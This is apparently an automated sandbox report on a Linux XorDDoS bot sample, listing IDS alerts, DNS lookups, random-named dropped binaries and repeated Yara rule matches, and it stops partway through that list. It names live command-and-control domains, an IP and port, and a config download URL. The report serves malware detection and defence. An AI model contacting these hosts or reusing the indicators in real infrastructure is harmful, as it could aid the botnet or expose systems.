Source: Network traffic	Suricata IDS: 2021326 - Severity 1 - ET MALWARE Likely Linux/Xorddos.F DDoS Attack Participation (aa.hostasa.org) : 192.168.2.23:39078 -> 8.8.4.4:53
Source: Network traffic	Suricata IDS: 2021326 - Severity 1 - ET MALWARE Likely Linux/Xorddos.F DDoS Attack Participation (aa.hostasa.org) : 192.168.2.23:33405 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2021326 - Severity 1 - ET MALWARE Likely Linux/Xorddos.F DDoS Attack Participation (aa.hostasa.org) : 192.168.2.23:51452 -> 8.8.8.8:53
Source: Network traffic	Suricata IDS: 2020381 - Severity 1 - ET MALWARE DDoS.XOR Checkin : 192.168.2.23:55858 -> 137.175.90.213:1522

Source: global traffic

TCP traffic: 192.168.2.23:55858 -> 137.175.90.213:1522

Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: aa.hostasa.org
Source: global traffic	DNS traffic detected: DNS query: ppp.gggatat456.com

Source: UDMp3dZ7nc.elf, 6260.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6262.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6263.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6264.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6293.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6296.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6298.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6301.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6303.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6311.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6314.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6316.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6319.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6322.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6328.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6331.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6333.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6335.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6338.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6364.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6367.1.00000000ff80b000.00000000ff82c000.rw-.sdmp	String found in binary or memory: http://aa.hostasa.org/config.rar
Source: UDMp3dZ7nc.elf, 6260.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6262.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6263.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6264.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6293.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6296.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6298.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6301.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6303.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6311.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6314.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6316.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6319.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6322.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6328.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6331.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6333.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6335.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6338.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6364.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6367.1.00000000ff80b000.00000000ff82c000.rw-.sdmp	String found in binary or memory: http://aa.hostasa.org/config.rartat456.com:1522
Source: UDMp3dZ7nc.elf, libudev.so.13.dr, bgoiqqymph.13.dr, dthtwwmqvu.13.dr, eqoogeqyds.13.dr, otlzwyqefc.13.dr, vnihfmehfy.13.dr, ksagqhmoao.13.dr, oigyzaiygp.13.dr, sosfbbrzmx.13.dr, qxzsiorokf.13.dr, uhjkqkcgma.13.dr, uzqdvpyngy.13.dr, gphlkawhxw.13.dr, jeyjdycnpv.13.dr, wutujskjnm.13.dr	String found in binary or memory: http://www.gnu.org/software/libc/bugs.html

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

DDoS

Yara detected XorDDoS Bot

Source: Yara match	File source: UDMp3dZ7nc.elf, type: SAMPLE
Source: Yara match	File source: 6455.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6381.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6262.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6296.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6375.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6260.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6552.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6303.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6400.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6372.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6482.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6513.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6516.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6408.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6474.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6298.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6525.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6457.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6391.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6369.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6333.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6331.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6496.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6422.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6498.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6510.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6338.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6367.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6364.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6440.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6301.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6410.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6322.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6417.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6576.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6388.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6491.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6263.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6579.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6508.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6530.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6533.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6403.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6420.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6319.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6562.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6479.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6394.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6593.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6428.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6488.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6536.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6493.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6460.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6311.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6335.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6316.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6435.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6567.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6584.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6386.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6545.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6559.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6564.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6264.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6446.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6549.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6581.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6425.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6528.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6314.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6570.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6471.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6505.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6443.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6405.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6598.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6587.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6438.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6547.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6463.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6328.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6542.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6452.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6596.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6293.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6476.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6260, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6262, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6263, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6264, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6293, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6298, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6301, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6303, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6311, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6314, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6319, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6322, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6328, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6331, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6333, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6335, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6338, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6367, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6369, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6375, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6381, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6386, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6391, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6394, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6403, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6405, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6410, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6417, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6422, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6425, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6435, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6438, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6443, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6446, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6452, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6455, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6457, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6460, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6463, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6471, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6474, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6476, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6479, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6482, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6491, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6493, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6498, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6505, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6510, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6513, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6516, type: MEMORYSTR
Source: Yara match	File source: /usr/bin/sosfbbrzmx, type: DROPPED
Source: Yara match	File source: /usr/bin/uhjkqkcgma, type: DROPPED
Source: Yara match	File source: /usr/bin/vnihfmehfy, type: DROPPED
Source: Yara match	File source: /usr/bin/oigyzaiygp, type: DROPPED
Source: Yara match	File source: /usr/bin/otlzwyqefc, type: DROPPED
Source: Yara match	File source: /usr/bin/ksagqhmoao, type: DROPPED
Source: Yara match	File source: /usr/bin/eqoogeqyds, type: DROPPED
Source: Yara match	File source: /usr/bin/wutujskjnm, type: DROPPED
Source: Yara match	File source: /usr/bin/qxzsiorokf, type: DROPPED
Source: Yara match	File source: /usr/bin/gphlkawhxw, type: DROPPED
Source: Yara match	File source: /usr/bin/uzqdvpyngy, type: DROPPED
Source: Yara match	File source: /usr/lib/libudev.so, type: DROPPED
Source: Yara match	File source: /usr/bin/snluqxjnyb, type: DROPPED
Source: Yara match	File source: /usr/bin/jeyjdycnpv, type: DROPPED
Source: Yara match	File source: /usr/bin/bgoiqqymph, type: DROPPED
Source: Yara match	File source: /usr/bin/dthtwwmqvu, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: UDMp3dZ7nc.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: UDMp3dZ7nc.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: UDMp3dZ7nc.elf, type: SAMPLE	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6455.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6455.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6455.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6381.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6381.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6381.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6262.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6262.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6262.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6296.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6296.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6296.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6375.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6375.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6375.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6260.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6260.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6260.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6552.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6552.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6552.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6303.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6303.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6303.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6400.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6400.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6400.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6372.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6372.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6372.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6482.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6482.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6482.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6513.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6513.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6513.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6516.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6516.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6516.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6408.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6408.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6408.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6474.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6474.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6474.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6298.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
